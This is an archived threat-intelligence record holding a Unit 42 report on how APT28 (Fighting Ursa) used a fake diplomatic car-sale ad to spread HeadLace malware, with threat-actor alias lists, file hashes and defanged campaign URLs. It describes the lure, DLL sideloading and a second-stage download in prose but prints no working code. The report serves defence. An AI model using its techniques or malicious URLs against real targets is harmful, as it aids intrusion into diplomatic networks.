{ "id": "fc4a410e-4805-4d57-84e0-251695e240a6", "created_at": "2026-04-06T00:18:35.694625Z", "updated_at": "2026-04-10T13:11:23.705872Z", "deleted_at": null, "sha1_hash": "ed08135286f93b1743d796768ac370e2d1a97799", "title": "Fighting Ursa Luring Targets With Car for Sale", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2963774, "plain_text": "Fighting Ursa Luring Targets With Car for Sale\r\nBy Unit 42\r\nPublished: 2024-08-02 · Archived: 2026-04-05 14:56:21 UTC\r\nExecutive Summary\r\nA Russian threat actor we track as Fighting Ursa advertised a car for sale as a lure to distribute HeadLace\r\nbackdoor malware. The campaign likely targeted diplomats and began as early as March 2024. Fighting Ursa (aka\r\nAPT28, Fancy Bear and Sofacy) has been associated with Russian military intelligence and classified as an\r\nadvanced persistent threat (APT) [PDF].\r\nDiplomatic-car-for-sale phishing lure themes have been used by Russian threat actors for years. These lures tend\r\nto resonate with diplomats and get targets to click on the malicious content.\r\nUnit 42 has previously observed other threat groups using this tactic. For example, in 2023, a different Russian\r\nthreat group, Cloaked Ursa, repurposed an advertisement for a BMW for sale to target diplomatic missions within\r\nUkraine. This campaign is not directly connected to the Fighting Ursa campaign described here. However, the\r\nsimilarity in tactics points to known behaviors of Fighting Ursa. The Fighting Ursa group is known for\r\nrepurposing successful tactics – even continuously exploiting known vulnerabilities for 20 months after their\r\ncover was already blown.\r\nThe details of the March 2024 campaign, which we attribute to Fighting Ursa with a medium to high level of\r\nconfidence, indicate the group targeted diplomats and relied on public and free services to host various stages of\r\nthe attack. This article examines the infection chain from the attack.\r\nPalo Alto Networks customers are better protected from the threats discussed in this article through our Network\r\nSecurity solutions, such as Advanced WildFire and Advanced URL Filtering, as well as our Cortex line of\r\nproducts.\r\nIf you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response\r\nteam.\r\nInitial Lure\r\nThe URL kicking off this infection chain was hosted by a legitimate service named Webhook.site, and it was\r\nsubmitted to VirusTotal on March 14, 2024. Webhook.site is a service for legitimate development projects, and it\r\nallows its users to create randomized URLs for various purposes like custom automation based on the\r\ncharacteristics of visitors to the URLs.\r\nIn this case, Fighting Ursa abused Webhook.site to craft a URL that returned a malicious HTML page. Figure 1\r\nbelow shows the HTML returned from the webhook[.]site URL.\r\nhttps://unit42.paloaltonetworks.com/fighting-ursa-car-for-sale-phishing-lure/\r\nPage 1 of 6\n\nFigure 1. HTML code used in the attack hosted on the Webhook.site service.\r\nThe HTML shown above in Figure 1 has multiple elements that attempt to automate the attack. First, it checks if\r\nthe visiting computer is Windows-based. If not, it redirects to a decoy image on a URL hosted by another\r\nlegitimate provider, which is a free service named ImgBB. As the final payload is Windows based, this operating\r\nsystem check is probably an effort to ensure that further actions taken in the attack are only taken for Windows\r\nvisitors. The HTML then creates a ZIP archive from Base64 text in the HTML, offers it for download and attempts\r\nto open it with the JavaScript click() function.\r\nFigure 2 below shows the decoy image advertising a car for sale, specifically an Audi Q7 Quattro SUV. This fake\r\nadvertisement is titled “Diplomatic Car For Sale.”\r\nThe image provides different views of the vehicle. The image also contains contact details that are likely fake, as\r\nwell as a phone number based in Romania. Finally, the image also lists the point of contact as the Southeast\r\nEuropean Law Enforcement Center, possibly to lend this fake advertisement more credibility.\r\nhttps://unit42.paloaltonetworks.com/fighting-ursa-car-for-sale-phishing-lure/\r\nPage 2 of 6\n\nFigure 2. Diplomatic car for sale lure hosted on ImgBB.\r\nDownloaded Malware\r\nThe downloaded ZIP archive is saved as IMG-387470302099.zip and contains three files listed below in Table 1.\r\nFile Size Modified Date and Time File Name\r\n918,528 bytes 2009-07-13 18:38 UTC IMG-387470302099.jpg.exe\r\n9,728 bytes 2024-03-13 00:37 UTC WindowsCodecs.dll\r\n922 bytes 2024-03-13 00:37 UTC zqtxmo.bat\r\nTable 1. Contents of the downloaded file IMG-387470302099.zip.\r\nTable 1 above shows that the first file IMG-387470302099.jpg.exe has a double file extension of .jpg.exe.\r\nWindows hosts with a default configuration hide file extensions, so the .jpg.exe file extension only shows as .jpg\r\nin the file name. This is a common tactic used by threat actors to trick potential victims into double-clicking the\r\nfile, in this case believing it will open a car for sale advertisement.\r\nThe file named IMG-387470302099.jpg.exe is a copy of the legitimate Windows calculator file calc.exe. This file\r\nis used to sideload the included DLL file WindowsCodecs.dll, which is a component of the HeadLace backdoor.\r\nhttps://unit42.paloaltonetworks.com/fighting-ursa-car-for-sale-phishing-lure/\r\nPage 3 of 6\n\nHeadLace is modular malware that executes in stages. This stage-based loading is probably designed to prevent\r\ndetection and minimize the malware's exposure to analysts. The DLL file contains a function shown below in\r\nFigure 3.\r\nFigure 3. Code in WindowsCodecs.dll file to run a file named zqtxmo.bat.\r\nThis function is solely meant to execute the last file within the ZIP archive, zqtxmo.bat. Figure 4 below shows the\r\ncontent of zqtxmo.bat.\r\nFigure 4. Contents of the zqtxmo.bat batch file.\r\nThis batch file starts a process for Microsoft Edge (start msedge) to run content passed as Base64-encoded text. As\r\nshown above in Figure 4, the decoded text is a hidden iframe that retrieves content from a different Webhook.site\r\nURL.\r\nThe batch file saves content from this second Webhook.site URL as IMG387470302099.jpg in the user's\r\ndownloads directory. It then moves the downloaded file into the %programdata% directory and changes the file\r\nextension from .jpg to .cmd. Finally, the batch file executes IMG387470302099.cmd, then deletes itself as a way\r\nto remove any obvious trace of malicious activity.\r\nAttribution\r\nWe attribute this activity with a medium to high level of confidence to Fighting Ursa based on the tactics,\r\ntechniques and procedures (TTPs), characteristics of the attack infrastructure and the malware family attackers\r\nused.\r\nhttps://unit42.paloaltonetworks.com/fighting-ursa-car-for-sale-phishing-lure/\r\nPage 4 of 6\n\nThis attack relies heavily on public and free services to host lures and various stages of the attack. Documentation\r\nby IBM, Proofpoint, Recorded Future and others reveal that while the infrastructure used by Fighting Ursa varies\r\nfor different attack campaigns, the group frequently relies on these freely available services. Furthermore, the\r\ntactics from this campaign fit with previously documented Fighting Ursa campaigns, and the HeadLace backdoor\r\nis exclusive to this threat actor.\r\nConclusion\r\nFighting Ursa is a motivated threat actor. The infrastructure the group uses has constantly changed and evolved, as\r\nnoted in a recent report from Recorded Future. Other industry reports have also shown various lures this actor uses\r\nin attempts to drop HeadLace malware.\r\nWe assess that Fighting Ursa will continue to use legitimate web services in its attack infrastructure. To defend\r\nagainst these attacks, defenders should limit access to these or similar hosting services as necessary. If possible,\r\norganizations should scrutinize the use of these free services to identify possible attack vectors.\r\nPalo Alto Networks Protection and Mitigation\r\nPalo Alto Networks customers are better protected from the threats discussed above through the following\r\nproducts:\r\nCortex XDR detects the attack chain described above, among other protections in the Cortex XDR\r\nplatform.\r\nCortex XSIAM and XSOAR have released a response pack and playbook for automatically detecting the\r\nFighting Ursa threat actor. This playbook downloads the APT28 detection rules and performs extraction,\r\nenrichment, and tagging of indicators. It executes our generic Threat Hunting sub-playbook and\r\nsubsequently provides analysts with recommended workarounds, empowering them to decide the best\r\ncourse of action with the enriched indicators.\r\nAdvanced URL Filtering identifies known URLs associated with this activity as malicious.\r\nThe Advanced WildFire machine-learning models and analysis techniques have been reviewed and updated\r\nin light of the IoCs shared in this research.\r\nIf you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident\r\nResponse team or call:\r\nNorth America Toll-Free: 866.486.4842 (866.4.UNIT42)\r\nEMEA: +31.20.299.3130\r\nAPAC: +65.6983.8730\r\nJapan: +81.50.1790.0200\r\nPalo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA\r\nmembers use this intelligence to rapidly deploy protections to their customers and to systematically disrupt\r\nmalicious cyber actors. Learn more about the Cyber Threat Alliance.\r\nIndicators of Compromise\r\nhttps://unit42.paloaltonetworks.com/fighting-ursa-car-for-sale-phishing-lure/\r\nPage 5 of 6\n\nHTML page hosted on webhook site with decoy image and payload zip file:\r\ncda936ecae566ab871e5c0303d8ff98796b1e3661885afd9d4690fc1e945640e\r\nCar for sale image lure:\r\n7c85ff89b535a39d47756dfce4597c239ee16df88badefe8f76051b836a7cbfb\r\nZIP file containing calc.exe, malicious DLL and BAT file:\r\ndad1a8869c950c2d1d322c8aed3757d3988ef4f06ba230b329c8d510d8d9a027\r\nLegitimate calc.exe abused to sideload the malicious DLL:\r\nc6a91cba00bf87cdb064c49adaac82255cbec6fdd48fd21f9b3b96abf019916b\r\nMalicious file named WindowsCodecs.dll sideloaded by calc.exe:\r\n6b96b991e33240e5c2091d092079a440fa1bef9b5aecbf3039bf7c47223bdf96\r\nBatch file named zqtxmo.bat executed by the above malicious DLL:\r\na06d74322a8761ec8e6f28d134f2a89c7ba611d920d080a3ccbfac7c3b61e2e7\r\nURLs that hosted content for this campaign:\r\nhxxps[:]//webhook[.]site/66d5b9f9-a5eb-48e6-9476-9b6142b0c3ae\r\nhxxps[:]//webhook[.]site/d290377c-82b5-4765-acb8-454edf6425dd\r\nhxxps[:]//i.ibb[.]co/vVSCr2Z/car-for-sale.jpg\r\nSource: https://unit42.paloaltonetworks.com/fighting-ursa-car-for-sale-phishing-lure/\r\nhttps://unit42.paloaltonetworks.com/fighting-ursa-car-for-sale-phishing-lure/\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "origins": [ "web" ], "references": [ "https://unit42.paloaltonetworks.com/fighting-ursa-car-for-sale-phishing-lure/" ], "report_names": [ "fighting-ursa-car-for-sale-phishing-lure" ], "threat_actors": [ { "id": "a241a1ca-2bc9-450b-a07b-aae747ee2710", "created_at": "2024-06-19T02:03:08.150052Z", "updated_at": "2026-04-10T02:00:03.737173Z", "deleted_at": null, "main_name": "IRON RITUAL", "aliases": [ "APT29", "Blue Dev 5 ", "BlueBravo ", "Cloaked Ursa ", "CozyLarch ", "Dark Halo ", "Midnight Blizzard ", "NOBELIUM ", "StellarParticle ", "UNC2452 " ], "source_name": "Secureworks:IRON RITUAL", "tools": [ "Brute Ratel C4", "Cobalt Strike", "EnvyScout", "GoldFinder", "GoldMax", "NativeZone", "RAINDROP", "SUNBURST", "Sibot", "TEARDROP", "VaporRage" ], "source_id": "Secureworks", "reports": null }, { "id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb", "created_at": "2023-01-06T13:46:38.393409Z", "updated_at": "2026-04-10T02:00:02.955738Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "Cloaked Ursa", "TA421", "Blue Kitsune", "BlueBravo", "IRON HEMLOCK", "G0016", "Nobelium", "Group 100", "YTTRIUM", "Grizzly Steppe", "ATK7", "ITG11", "COZY BEAR", "The Dukes", "Minidionis", "UAC-0029", "SeaDuke" ], "source_name": "MISPGALAXY:APT29", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null }, { "id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270", "created_at": "2022-10-25T16:07:23.341684Z", "updated_at": "2026-04-10T02:00:04.549917Z", "deleted_at": null, "main_name": "APT 29", "aliases": [ "APT 29", "ATK 7", "Blue Dev 5", "BlueBravo", "Cloaked Ursa", "CloudLook", "Cozy Bear", "Dark Halo", "Earth Koshchei", "G0016", "Grizzly Steppe", "Group 100", "ITG11", "Iron Hemlock", "Iron Ritual", "Midnight Blizzard", "Minidionis", "Nobelium", "NobleBaron", "Operation Ghost", "Operation Office monkeys", "Operation StellarParticle", "SilverFish", "Solar Phoenix", "SolarStorm", "StellarParticle", "TEMP.Monkeys", "The Dukes", "UNC2452", "UNC3524", "Yttrium" ], "source_name": "ETDA:APT 29", "tools": [ "7-Zip", "ATI-Agent", "AdFind", "Agentemis", "AtNow", "BEATDROP", "BotgenStudios", "CEELOADER", "Cloud Duke", "CloudDuke", "CloudLook", "Cobalt Strike", "CobaltStrike", "CosmicDuke", "Cozer", "CozyBear", "CozyCar", "CozyDuke", "Danfuan", "EnvyScout", "EuroAPT", "FatDuke", "FoggyWeb", "GeminiDuke", "Geppei", "GoldFinder", "GoldMax", "GraphDrop", "GraphicalNeutrino", "GraphicalProton", "HAMMERTOSS", "HammerDuke", "LOLBAS", "LOLBins", "LiteDuke", "Living off the Land", "MagicWeb", "Mimikatz", "MiniDionis", "MiniDuke", "NemesisGemina", "NetDuke", "OnionDuke", "POSHSPY", "PinchDuke", "PolyglotDuke", "PowerDuke", "QUIETEXIT", "ROOTSAW", "RegDuke", "Rubeus", "SNOWYAMBER", "SPICYBEAT", "SUNSHUTTLE", "SeaDaddy", "SeaDask", "SeaDesk", "SeaDuke", "Sharp-SMBExec", "SharpView", "Sibot", "Solorigate", "SoreFang", "TinyBaron", "WINELOADER", "WellMail", "WellMess", "cobeacon", "elf.wellmess", "reGeorg", "tDiscoverer" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434715, "ts_updated_at": 1775826683, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/ed08135286f93b1743d796768ac370e2d1a97799.pdf", "text": "https://archive.orkl.eu/ed08135286f93b1743d796768ac370e2d1a97799.txt", "img": "https://archive.orkl.eu/ed08135286f93b1743d796768ac370e2d1a97799.jpg" } }